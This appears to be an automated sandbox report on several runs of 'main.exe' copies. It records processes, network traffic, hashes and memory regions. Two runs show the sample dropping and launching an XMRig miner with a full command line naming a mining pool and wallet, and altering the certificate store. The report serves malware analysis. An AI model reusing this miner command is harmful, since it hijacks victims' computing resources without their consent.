memory/3664-44-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-45-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-46-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-47-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-48-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-49-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-50-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-51-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-52-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-53-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-54-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-55-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-56-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-57-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-58-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-59-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-60-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-61-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-62-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-63-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-64-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-65-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-66-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-67-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-68-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-69-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-70-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-71-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-72-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-73-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-74-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-75-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-76-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-77-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-78-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-79-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-80-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-81-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-82-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-83-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-84-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:36

Platform

win10v2004-20240508-en

Max time kernel

1691s

Max time network

1703s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:40

Platform

win10v2004-20240508-en

Max time kernel

1660s

Max time network

1673s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:31

Platform

win10v2004-20240508-en

Max time kernel

1724s

Max time network

1736s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:33

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4188,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4100,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=1392 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:39

Platform

win10v2004-20240508-en

Max time kernel

1784s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:41

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:43

Platform

win10v2004-20240508-en

Max time kernel

1786s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 512 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 131.253.33.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4400-14-0x000001D52A0C0000-0x000001D52A0E0000-memory.dmp

memory/4400-15-0x000001D52B8D0000-0x000001D52B8F0000-memory.dmp

memory/4400-16-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-18-0x000001D52B910000-0x000001D52B930000-memory.dmp

memory/4400-17-0x000001D52B8F0000-0x000001D52B910000-memory.dmp

memory/4400-19-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-20-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-23-0x000001D52B910000-0x000001D52B930000-memory.dmp

memory/4400-22-0x000001D52B8F0000-0x000001D52B910000-memory.dmp

memory/4400-21-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-24-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-25-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-26-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-27-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-28-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-29-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-30-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-31-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-32-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-33-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-34-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-35-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-36-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-37-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-38-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-39-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-40-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-41-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-42-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-43-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-44-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-45-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-46-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-47-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-48-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-49-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-50-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-51-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-52-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-53-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-54-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-55-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-56-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-57-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-58-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-59-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-60-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-61-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-62-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-63-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-64-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-65-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-66-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-67-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-68-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-69-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-70-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-71-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-72-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-73-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-74-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-75-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-76-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-77-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-78-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-79-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-80-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-81-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

memory/4400-82-0x00007FF6CF380000-0x00007FF6CFE83000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5144 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=560 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
